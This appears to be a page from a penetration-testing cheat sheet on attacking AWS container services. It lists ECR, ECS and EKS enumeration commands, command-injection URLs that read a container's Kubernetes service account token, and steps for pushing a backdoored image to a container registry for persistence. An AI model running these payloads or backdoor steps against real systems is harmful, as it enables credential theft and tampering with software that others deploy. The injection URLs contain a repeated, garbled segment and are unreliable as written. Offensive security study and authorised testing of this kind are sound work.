Containers

Containers exploitation

3 categories:

  • Registry: store and manage container images: ECR (Elastic Container Registry)

  • Orchestration: when and where containers run: ECS (Elastic Container Service) and EKS (Elastic Kubernetes Service)

  • Compute: run containers: Fargate (servless compute engine) and EC2

Enumeration

ECR

Repositories in the container registry

aws ecr describe-repositories

Information about the repo policy

aws ecr get-repository-policy --repository-name [repo-name]

List all images in the specified repository

aws ecr list-images --repository-name [repo-name]

Information about a container image

aws ecr describe-images --repository-name [repo-name] --image-ids imageTag=[imageTag]

Authenticate to ECR

export AWS_ACCESS_KEY_ID="<access_key>"
export AWS_SECRET_ACCESS_KEY=”<secret_key>"
aws ecr get-login-password --profile <profile_name> --region <region> | sudo docker login --username AWS --password-stdin <container_registry>

Pull Image from ECR

podman pull <registry>.dkr.ecr.<region>.amazonaws.com/<repository>

Create New Container

podman create --name route-optimization-container <registry>.dkr.ecr.<region>.amazonaws.com/<repository>:latest

Mount and Enumerate Container File System

podman unshare

podman mount <container-name>

ECS

List all ECS clusters

aws ecs list-clusters

Information about specified cluster

aws ecs describe-clusters --cluster [cluster-name]

List all services in the specified cluster

aws ecs list-services --cluster [cluster-name]

Information about a specified service

aws ecs describe-services --cluster [cluster-name] --services [service-name]

List all tasks in the specified cluster

aws ecs describe-tasks --cluster [cluster-name] --tasks [task-arn]

List all containers in the specified cluster

aws ecs list-container-instances --cluster [cluster-name]

EKS

List all EKS clusters

aws eks list-clusters

Information about a specified cluster

aws eks describe-cluster --name [cluster-name]

List of all node groups in a specified cluster

aws eks list-nodegroups --cluster-name [cluster-name]

Information about a specified node group in a cluster

aws eks describe-nodegroup --cluster-name [cluster-name] --nodegroup-name [node-group]

List of all fargate in a specified cluster

aws eks list-fargate-profiles --cluster-name [cluster-name]

Information about a specific fargate profile in a cluster

aws eks describe-fargate-profile --cluster-name [cluster-name] --fargate-profile-name [profile-name]

Initial Access

RCE - Command injection

  • List of all secret in EKS vulnerable container

http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=ls%20%20%20/var/run/secrets/kubernetes.io/serviceaccount

  • Get the secret information from running EKS vulnerable container

http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=cat%20%20%20/var/run/secrets/kubernetes.io/serviceaccount/token

Persistence

docker pull <ecr_registry>/<image>:latest
docker build -t <image> .
docker tag <image>:latest <ecr_registry>/<image>:latest
docker push <ecr_registry>/<image>:latest

  • Step By step

Authenticate docker daemon to ECR

export AWS_ACCESS_KEY_ID="<access_key>"
export AWS_SECRET_ACCESS_KEY=”<secret_key>"
aws ecr get-login-password --profile <profile_name> --region <region> | sudo docker login --username AWS --password-stdin <container_registry> 

aws ecr get-login-password --region [region] | docker login --username AWS --password-stdin [ECR-Addr]

Build backdoored docker image

docker build -t [Image-name] .

Tag the docker image

docker tag [Image-name] [ECR-addr]:[Image-name]

Push the docker image to AWS Container Registry

docker push [ECR-addr]:[Image-name]

Interesting Book

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

PreviousLambda FunctionsNextCodeBuild

Last updated